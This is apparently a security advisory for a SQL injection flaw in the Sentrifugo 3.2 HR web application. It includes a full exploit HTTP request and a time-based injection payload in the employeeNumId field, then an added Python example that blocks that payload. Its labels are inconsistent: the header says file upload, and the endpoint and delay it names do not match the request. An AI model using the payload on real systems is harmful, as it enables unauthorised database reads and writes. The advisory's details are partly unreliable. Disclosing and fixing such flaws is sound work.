Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2
Vulnerability: Unrestricted File Upload
CVE: CVE-2020-26805
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs… Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more. Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference: https://sourceforge.net/projects/sentrifugo/
Vulnerability Description:
In the Sentrifugo web application, an admin can edit an employee’s information via this endpoint: sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, the employeeNumId parameter is affected by an SQLi vulnerability. An attacker can inject SQL commands into the query, read data from the database, or write data into the database. If you send the request below, the response arrives approximately 5 seconds later because of the SLEEP command.
POST /sentrifugo/index.php/employee/edit/id/2 HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 421
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/sentrifugo/index.php/employee/edit/id/2
Cookie: PHPSESSID=4p9aptkj3tg0kp675mtaf9d02v
Upgrade-Insecure-Requests: 1

tmp_emp_name=&act_inact=0&id=2&user_id=2&final_emp_id=EMPP1&id=2&user_id=2&employeeId=EMPP&employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ&prefix_id=&firstname=adas&lastname=asdasd&hid_modeofentry=Direct&disp_requi=&emprole=2&emailaddress=asdasd%40tasd.com&jobtitle_id=&position_id=&date_of_joining=2020%2F10%2F13&years_exp=&office_number=&extension_number=&office_faxnumber=&submit=Update
Payload:
employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ
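A server-side handling of the employeeNumId field that rejects the value shown above, as an added example that is not Sentrifugo's code or the advisory author's: the field is checked against an all-digit allow-list and the lookup uses a bound parameter instead of string concatenation. It assumes employeeNumId is the numeric suffix of the employee ID; the `employees` table, its columns, the function names and the use of SQLite as a stand-in database are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: employeeNumId is the numeric suffix of the employee ID
# (the request on this page has employeeId=EMPP and final_emp_id=EMPP1).
DIGITS = re.compile(r"[0-9]{1,10}")

def employee_num_id(body: str) -> int:
    """Return employeeNumId from a form-encoded body, or raise ValueError."""
    values = parse_qs(body, keep_blank_values=True).get("employeeNumId", [])
    if len(values) != 1 or not DIGITS.fullmatch(values[0]):
        raise ValueError("employeeNumId must be one all-digit value")
    return int(values[0])

def find_user(conn: sqlite3.Connection, employee_id: str):
    """Look up a user with the value bound as a parameter, never concatenated."""
    cur = conn.execute(
        "SELECT user_id FROM employees WHERE employee_id = ?", (employee_id,)
    )
    return cur.fetchone()

def demo_db() -> sqlite3.Connection:
    # Hypothetical one-table schema, constructed for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (user_id INTEGER, employee_id TEXT)")
    conn.execute("INSERT INTO employees VALUES (2, 'EMPP1')")
    return conn

# Constructed bodies: a normal edit, and the employeeNumId value from this page.
BENIGN = "user_id=2&employeeId=EMPP&employeeNumId=1&firstname=adas"
INJECTED = ("user_id=2&employeeId=EMPP&employeeNumId=1' AND (SELECT 6376 FROM "
            "(SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ&firstname=adas")

def handle(conn: sqlite3.Connection, body: str):
    """Validate first, then query; returns the matching row or None."""
    fields = parse_qs(body, keep_blank_values=True)
    prefix = fields.get("employeeId", [""])[0]
    return find_user(conn, prefix + str(employee_num_id(body)))

if __name__ == "__main__":
    db = demo_db()
    print(handle(db, BENIGN))
    try:
        handle(db, INJECTED)
    except ValueError as exc:
        print("rejected:", exc)
```

Either control alone stops the request on this page: validation rejects it before any query runs, and a bound parameter would compare the whole string as data.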